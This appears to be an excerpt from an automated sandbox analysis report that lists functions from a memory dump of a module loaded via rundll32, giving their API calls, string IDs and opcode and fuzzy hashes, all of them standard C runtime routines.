                                                                                                                                                                                                                                                              • Instruction ID: a15ec74f0178b7d0881183cce415230650c0017c5e4b970fb49a7c44440e13dd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d49535a4ef8ca49a0275abb315b68194c4567bf6e5752b47c39ad4faf8bbe7ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6F0143148260EDBAB94DB98E599C5B33EFBF027127610809F41CD7600DB20F8C08EA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                              • String ID: *?
                                                                                                                                                                                                                                                              • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                              • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                              • Instruction ID: b30e9e0bd04a8794e4232530a9a68b1ad97f1d27e4af14efd3295dc37289e90e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14614AB5D0021E9FDB14CFA8C9809EDFBFAEF49314B24856AD815E7304E775AE418B90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6E248E5F
                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6E248F13
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm$y$n
                                                                                                                                                                                                                                                              • API String ID: 3480331319-3383992723
                                                                                                                                                                                                                                                              • Opcode ID: 6248558af29b3498b685ee2a764a1bf4bcbfa740e81ea6918b6f00023aa46b75
                                                                                                                                                                                                                                                              • Instruction ID: 20438a87cde174028c6bce8ef5fe25aeaf0dc456d7db6a3bf8fbddcbef05f307
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6248558af29b3498b685ee2a764a1bf4bcbfa740e81ea6918b6f00023aa46b75
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D41B335A2021EEBCF08DFA8C884A9EBBB7BF45318F048455F9185B351D7319915CBD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 6E2498AB
                                                                                                                                                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 6E249991
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                                              • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                              • Opcode ID: b59250a37a04372f19d6f5f2e52db9df2855a4d4711f3d18ad78ec8234a419ff
                                                                                                                                                                                                                                                              • Instruction ID: aab345bd216e8d699692a67c7b05338f37ed5afa904620924ba77f143874294a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b59250a37a04372f19d6f5f2e52db9df2855a4d4711f3d18ad78ec8234a419ff
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1141387190020FEFDF0ACFD4CE80AEE7BB6BF48305F144459E91866255D335A960DB50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,6E27947C,00000000,?,?,6E24C2C2,?,?,6E24C28A,?,?,?), ref: 6E24C325
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,6E279494), ref: 6E24C338
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6E24C2C2,?,?,6E24C28A,?,?,?), ref: 6E24C35B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 4061214504-731774800
                                                                                                                                                                                                                                                              • Opcode ID: ae4b65a0439839baf4bdbd87f1984ac23a858059e467356d9c5360f8ef6ccc3d
                                                                                                                                                                                                                                                              • Instruction ID: c2e646ddcdb8429db76bdfb22996f743dc8bc1929255a498ffe9d22f50f85f6e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae4b65a0439839baf4bdbd87f1984ac23a858059e467356d9c5360f8ef6ccc3d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF08C31500A2EFBEF119BA5CA1EBDD7F7AEB00B66F044060A915A5150CB758E54EAA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E256DAD
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E256DD6
                                                                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000,6E254603,00000000,6E24FCD2,?,?,?,?,?,?,?,6E254603,6E24FCD2,00000000), ref: 6E256E08
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6E254603,6E24FCD2,00000000,?,?,?,?,00000000,?), ref: 6E256E24
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1547350101-0
                                                                                                                                                                                                                                                              • Opcode ID: cf8a733a38ef4700723cf82e2a0ca8bb4a340e3b837c5e505c72d93d975f439e
                                                                                                                                                                                                                                                              • Instruction ID: 8222d74da1436e52c1e8dcb4a1c1ee6ccec66fabc002efa1c256ae6595cb219f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf8a733a38ef4700723cf82e2a0ca8bb4a340e3b837c5e505c72d93d975f439e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1141C27692160E9BDB415FF8CE80FCD377BAF46365F140D10E824A73A4EB35D8208A61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E2510C1: _free.LIBCMT ref: 6E2510CF
                                                                                                                                                                                                                                                                • Part of subcall function 6E251C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E24F667,00000000,00000001,6E24F5F6,6E253EDB,?,6E24F667,?,00000000,?,6E253C4A,0000FDE9,00000000,?), ref: 6E251CBC
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E250B07
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E250B0E
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E250B4D
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E250B54
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 167067550-0
                                                                                                                                                                                                                                                              • Opcode ID: ff7a087e773d734cc58cccf2d49463829b48733a0d021319afba073dfef6afad
                                                                                                                                                                                                                                                              • Instruction ID: 4f5b6ace61cfcbd5bed1309608b52992b8fc5a58fcfa4d7cb13b051f5542960c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff7a087e773d734cc58cccf2d49463829b48733a0d021319afba073dfef6afad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521A1B560461EAF9B109FE68ED0C9BB7AFEF0136D7108915F91997340E731EC608BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f03b424a33fbf30c51886c42bf5c6badee14af131e76dbd68f5da647e0325049
                                                                                                                                                                                                                                                              • Instruction ID: 6fa47e40a780d8f55e4dc70e6ed752161858b3cd09e2e4647465ecddc0323eaa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f03b424a33fbf30c51886c42bf5c6badee14af131e76dbd68f5da647e0325049
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20210B71A11A2AEBCF129FE59E44B5A376B9B02765F210510EC15A7380D770E968C5E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,6E253991,?,00000001,6E24F667,?,6E253E50,00000001,?,?,?,6E24F5F6,?,?), ref: 6E24D3B1
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D40E
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D444
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6E2800D0,000000FF,?,6E253E50,00000001,?,?,?,6E24F5F6,?,?,?,6E27EBD8,0000002C,6E24F667), ref: 6E24D44F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                                              • Opcode ID: 27669b09596e94c9273501c1ba59e8ea8ca99ba83339861c982b93322bc76243
                                                                                                                                                                                                                                                              • Instruction ID: 3a257786185b03f9f8f6d8d847e9e26fcefdaa92b1543fbfeb825a5efc82ecff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27669b09596e94c9273501c1ba59e8ea8ca99ba83339861c982b93322bc76243
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11087620570EEBEB4817E4DC84E5B222F9BC2679F240A24F924532C0EFE198148D31
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,00000001,6E280096,6E24D67C,6E24D707,6E280094,?,6E247E19,6E280096,6E280094,?,?,?,6E244DCE,00000001,6E280098), ref: 6E24D508
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D565
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D59B
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6E2800D0,000000FF,?,6E247E19,6E280096,6E280094,?,?,?,6E244DCE,00000001,6E280098), ref: 6E24D5A6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                                              • Opcode ID: 71749eca1edc7ef9e1271fe2438cd290efd09b320d966a6b8bfdf93b541a4f4c
                                                                                                                                                                                                                                                              • Instruction ID: 3fbe758ef5b3d0dfee114181d74410be0e1429a27142f33ae9a0a033b7e5afb3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71749eca1edc7ef9e1271fe2438cd290efd09b320d966a6b8bfdf93b541a4f4c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA110D762417099FEB4817F5DC84F5B126F97C367DB200B24F528972C0DFA18818C930
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,6E24A304,?,?,6E28C7C4,00000000,?,6E24A42F,00000004,6E2793A4,6E27939C,6E2793A4,00000000), ref: 6E24A2D3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                                                              • Opcode ID: 094aaf7dc9c5d0b9492766a295a3e0a2a94a1808b97f6b686fe6627315d2b9fc
                                                                                                                                                                                                                                                              • Instruction ID: f45c24725413bfac0acecefa81037dbe33f43e12206f538f9db9a3d623fcb14d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 094aaf7dc9c5d0b9492766a295a3e0a2a94a1808b97f6b686fe6627315d2b9fc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211E7B1A51A3BEBDF56CBE8CC44B4933A6AB06771F110131ED10AB280F771E900D6E5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,6E24F667,00000000,?,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001), ref: 6E257C03
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000,00000001,?,6E253E74,6E24F5F6), ref: 6E257C0F
                                                                                                                                                                                                                                                                • Part of subcall function 6E257BD5: CloseHandle.KERNEL32(6E280910,6E257C1F,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000,00000001), ref: 6E257BE5
                                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 6E257C1F
                                                                                                                                                                                                                                                                • Part of subcall function 6E257B97: CreateFileW.KERNEL32(6E27DD58,40000000,00000003,00000000,00000003,00000000,00000000,6E257BC6,6E256B6D,00000001,?,6E253920,00000000,?,00000001,00000000), ref: 6E257BAA
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,6E24F667,00000000,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000), ref: 6E257C34
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                                              • Opcode ID: b8a3c2d4f3e027c01c4519c95c00a2e43dd96b32b4bbfd7e1e847355b424f5e8
                                                                                                                                                                                                                                                              • Instruction ID: 0fad53ec8f39865773cb05afd6fdcb7d093020679fa9ef379c28d833fdf3d6f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8a3c2d4f3e027c01c4519c95c00a2e43dd96b32b4bbfd7e1e847355b424f5e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F01C3615252DBBDF221FD1CD0CD8E3F67FB4A7A1F048410FA29952A0D6328930DBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                              • API String ID: 0-2837366778
                                                                                                                                                                                                                                                              • Opcode ID: 501f590428818e887053cf3f6616a71a42033faa34f44bd7d3758850a7eff650
                                                                                                                                                                                                                                                              • Instruction ID: 1ad3c28a8a6d09b50ad11c6972f6dde0f9bedd6cfce1a7e547426059725078ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 501f590428818e887053cf3f6616a71a42033faa34f44bd7d3758850a7eff650
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2341B675A4061DEFEB15DBDDCD819AEBBBEEF86B10F104566E4049B200DB704A48CB54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%